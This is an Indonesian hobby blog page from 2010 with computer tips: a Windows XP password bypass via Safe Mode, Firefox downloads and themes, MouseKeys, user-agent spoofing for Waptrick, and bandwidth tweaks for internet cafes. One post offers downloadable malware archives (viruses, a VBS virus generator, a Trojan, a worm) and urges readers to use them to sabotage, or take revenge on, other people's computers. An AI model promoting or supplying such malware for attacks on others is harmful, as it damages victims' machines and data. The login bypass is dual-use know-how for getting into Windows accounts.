Rabu, 10 Februari 2010

Trik Menjebol Password Komputer

Diposkan oleh 'Oniee BeqicHan' di 17.55 13 komentar

cara mengetahui password komputer, cara menghilangkan password komputer, PC, cara menjebol password komputer, mengetahui password komputer dengan mudah, trik hack PC

Pernahkah kalian mengalami sesuatu seperti yang pernah saya alami?
Mmm. waktu itu aku lupa ma pasword di komputer aku. karena pada waktu itu aku belum tau caranya langsung saja aku instal ulang deh tu komputer, syukurlah semua beres. tapi kita semua tau kalau cara ini sangat tidak efektif karena dengan mnginstal komputer tentu memerlukan waktu yang sangat lama.

Nah pada postingan kali ini, saya akan membahas bagaimana cara menjebol pasword komputer terutama yang menggunakan microsoft xp.

Ok, langkah- langkahnya :
1. Restart computer dan segera tekan F8 saat loading, maka akan masuk ke Save mode

2. Setelah masuk ke safe mode, masuk lah sebagai administrator

3. Kemudian klik start-setting-control panel-user accounts.

4. Pilih user account yang diporteksi oleh password

5. Klik remove password

6. Restart kemblai computer untuk masuk ke windows

7. Sekarang anda sudah bisa login tanpa dihalangi oleh password lagi cobalah trik ini saat sobat lupa dengan passwor komputer kamu.

Semoga bermanfaat

Selasa, 02 Februari 2010

Mozilla Firefox 3.6 Terbaru

Diposkan oleh 'Oniee BeqicHan' di 20.50 1 komentar

mozilla firefox 3.6 final, free download, gratis, software terbaru 2010, software pc, download gratis, software terbaik 2010, terpopular, popular

Mozilla firefox 3.6 Final
Keluaran terbaru dari Mozilla, Download Mozilla Firefox 3.6 Final. Sowftware terbaru ini merupakan perbaikan dari versi sebelumnya.
Selain itu, Mozilla Firefox ini telah dilengkapi dengan penambahan berbagai fitur terbaru seperti peningkatan keamanan dan kesetabilan.
Bagi anda yang belum memiliki Mozilla ini, bisa download disini,

Mozilla Firefox 3.6 Final

Free Download Mozilla Firefox 3.6 Final

Cara Mengganti Tema Mozilla Firefox 3.6

Diposkan oleh 'Oniee BeqicHan' di 20.48 0 komentar

mozilla firefox 3.6, download, cara menggtanti tema mozilla firefox, mengganti template mozilla firefox, cara memaksimalkan mozilla firefox 3.6

Setelah sebelumnya saya sudah memposting artikel mengenai Mozilla Firefox 3.6, sekarang giliran saya memposting Cara Mengganti Tema/Themes/Template Mozilla Firefox 3.6
Sebelumnya, bagi anda yang belum memiliki Mozilla Firefox ini, bisa download DISINI

Ok, kembali ke masalah awal,
Tahukah Anda, Firefox terbaru yaitu versi 3.6 mempunyai kemampuan untuk mengganti tampilanya dengan mudah. Beragam themes tersedia tanpa harus mendownloadnya terlebih dahulu.
Fitur ini bernama Persona. Cara menggunakannya juga cukup mudah. Syaratnya kita hanya perlu menggunakan Firefox versi 3.6.
Jika anda sudah memiliki, menginstall dan menjalankan Firefox tersebut, maka anda akan langsung masuk ke halaman depan Persona, yaitu:

*http://www.getpersonas.com

DisanaAkan ada ribuan themes / Tema yang bisa anda dipilih sesuka anda.

*Untuk mengetahui previewnya jalankan mouse diatas beragam pilihan themes. Maka themes Anda akan berubah sendiri.

*Apabila ingin menggunakan silahkan klik themes tersebut. Apabila sudah masuk halaman themes yang dipilih klik Wear This Persona.

*Tapi tentu saja menyedot banyak data saat memilih- milh themes, karena setiap melewati sebuah link themes maka akan langsung dipreview.

*Terkadang themes malah membuat tampilan menu Firefox jadi susah dibaca.

Jadi silakan memilih themes sesuai keinginan Anda. Atau malah lebih senang dengan tampilan standart alias tanpa themes Default.

Semoga Bermanfaat

Cara Mengatasi Mouse Rusak / Bermasalah

Diposkan oleh 'Oniee BeqicHan' di 20.47 0 komentar

cara mengatasi kursor yang bermasalah, solusi kursor mati, cara memperbaiki kursor yang rusak, cursor, trik PC, mouse, mouse komputer

Mungkin anda pernah mengalami hal yang pernah saya alami juga, yaitu mouse rusak atau dengan kata lain kursor mouse tidak bisa digunakan, hehe
Ok, untuk menggerakkan cursor mouse yang mati, bisa anda gunakan tips seperti dibawah ini :

1. Tekan tombol windows
2. Gunakan panah keatas / kebawah untuk memilih menu Run.. lalu tekan enter
3. Ketik ‘access.cpl’ (tanpa tanda kutip)
4. Gunakan tombol Tab dan Panah kiri / Kanan Pada Keyboard, Untuk memilih Tab ‘Mouse’
5. Gunakan tombol Tab Pada Keyboard Untuk menyorot check box Use MouseKey lalu tekan Tombol Spasi Untuk menandainya

trik memperbaiki cursor, cara mengatasi cursor yang rusak, trik komputer, hacking PC, cara merawat komputer, cara mengatasi mouse rusak


6. Lalu Tekan Tombol Enter
7. Untuk menggerakan kursornya nyalakan pastikan lampu num lock nyala, dan anda bisa menggerakan kursor menggunakan angka2 pada Keypad.

Ok, segitu aja, Semoga Bermanfaat..

Kumpulan Virus PC / Komputer Terbaik

Diposkan oleh 'Oniee BeqicHan' di 20.44 2 komentar

virus PC unik, virus berkualitas, free download virus PC Gratis, Trik unik jailin komputer teman, virus komputer terbaik, 2010, antivirus, virus porno

Nih buat kamu yang suka usil/ ngerjain orang atau bahkan dendam sama seseorang, kamu jahilin aja pake virus virus ini.hehe jahat banget. Kalau udah succez dijamin Kompi/ PC si Dia bakal langsung K.O alias co.id . . .hehe

Eitzz . . . Tapi ada yang perlu kamu inget baik- baik, yaitu DOSA,DOSA.xaxaxa
Semua kembali pada niat kalian,Okey . . .!!!

Oh ya sebelum kamu download, ada yang mau q sampain.
Virus-virus ini merupakan virus dalam bentuk file .rar, so' kamu jangan
coba- coba meng- ekstract apalagi di klik, karena resiko bakal ditangggung sendiri . . .Kecuali kamu pake kompinya punya
warnet (kan pake deepfreeze)

Ok, langsung aja, kamu pilih virus yang kamu inginkan BUKAN
ANTI VIRUS !!!!

1. Kumpulan Virus.rar

2. Gambar porno.zip

3. Tlabs VBS Virus
Generator_software buat virus.zip


4. virus lapindo.zip

5. Trojan Horse.rar

6. viruz jpg.rar

7. worm_aniee.zip


Tapi inget yah, jangan terlalu jahat,hehe
Semoga bermanfaat

Cara Download File Waptrick Melalui PC / Komputer

Diposkan oleh 'Oniee BeqicHan' di 20.40 2 komentar

download file, cara download file waptrick melalui PC/ komputer, waptrick.com, download file waptrick dengan mudah, download gratis dari waptrick

Bingung mau download file waptrick melalui PC? coZ waptrick.com hanya bisa diakses via hp?
Tapi tenang, ada trik baru nih, yang mau download di waptrick lewat PC
gini caranya :
(make mozzila firefox)

1. Download add on nya di :
https://addons.mozilla.org/en-US/
firefox/addon/59


2. Setelah terinstall pilih user agent iphone 3.0

3. Sekarang coba masuk waptrick.com bisa kan???

4. Eits tunggu tapi ntar kalo kamu mau download file waptrick, formatnya kan jad? gini ngakalinnya,

Kamu buka file jad tersebut dengan notepad cari yang ada linknya kira2 seperti contoh ini :
http://94.101.90.251/games/
nok240x320m2/...Holmes.jar


5. Beres dah.....
Gampang kan?
Semoga bermanfaat plends
Ditunggu KomenTnya

Cara Mengambil bandwitdh Pada Warnet

Diposkan oleh 'Oniee BeqicHan' di 20.36 1 komentar

bandwidth warnet, cara mengambil bandwidth warnet, trik hack warnet, tutorial hack pc

Ok, berhubung ada yang minta ke saya supaya cepet- cepet nge-share trik ini, ya okelah aku jelasi sekarang.
Simak baik- baik

"TRIK MENGAMBIL BANDWITDH PADA WARNET"

Di warnet, pada umumnya bandwidth sangat tidak sinkron (tidak terbagi secara adil ) pada masing– masing komputer client, untuk proses download, umumnya orang
akan memaksa akses menggunakan Download Manager semacam FlashGet atau IDMan, namun ada juga warnet yang telah menyetarakan pembagian bandwidth masing– masing client menggunakan router mikrotik, nah kalo sudah disetarakan seperti ini, anda tidak dapat berbuat banyak.

Namun baiklah saya tetap harus memberikan caranya.
Untuk akses internet sendiri ( hanya untuk browsing ), anda bisa mengkonfigurasi proxy pada browser nya (dalam hal ini mozilla firefox), menggunakan SwitchProxy Tool 2.

Lanjut Cara nya :

1). Buka Browser Mozilla Firefox

2). Pada Address Bar Ketik : ABOUT:CONFIG

3). Cari string di bawah ini :( pastikan semua srting dibawah
“ TRUE”)
contoh menggantingnya :

NETWORK.HTTP.PIPELINING FALSE==> klik kanan dan pilih “Toggle”

NETWORK.HTTP.PIPELINING TRUE

NETWORK.HTTP.PIPELINING.MAXREQUESTS 64

NETWORK.HTTP.PROXY.PIPELINING TRUE

NETWORK.PROXY.SHARE_PROXY_SETTINGS
FALSE <=== ini harus False 4). buat srting baru caranya : Klik Kiri 1X Dimana Saja, Klik KananNEW>>INTEGER

5). Ketik :

NGLAYOUT.INITIALPAINT.DELAY
Beri Nilai 0

6). Kemudian REFRESH atau Tekan F5

7). Masuk ke alamat berikut :


https://addons.mozilla.org/extensions/
moreinfo.php?
id=125&applicationfiltered=firefox


atau

https://addons.mozilla.org/
extensions/moreinfo.php?
applicationfiltered=firefox&id=125


8). Lalu download aplikasi SwitchProxy Tools 2.0

9). Install aplikasi tersebut, hingga muncul toolbar baru di bawah addressbar.

Catatan :
Cara ini sangat efektif pada penggunaan warnet yang menggunakan akses internet broadband, ataupun pada wireless hotspot yang memiliki pengunjung cukup padat.

Untuk tips lainnya, yakni memaksa akses pada IDMan untuk mendownload setiap threadnya sehingga proses download dapat
berjalan lebih optimal.

Lanjut Caranya :

1) Buka IDMan (Internet Download
Manager)

2) Klik menu downloads lalu options

3) Pada tab connections ubah connection type/speed menjadi LAN
10mbps dan Default max. conn. number menjadi 16

4) Klik OK untuk selesai

5) Silahkan lakukan proses
download lalu rasakan perbedaan
nya. ( Proses download dari awal )



Ok,sampai disini dulu,
Semoga artikel ini bermanfaat

Jangan Lupa komenT^.^
 

Ilmu Komputer Copyright 2009 Reflection Designed by Ipiet Templates Image by Tadpole's Notez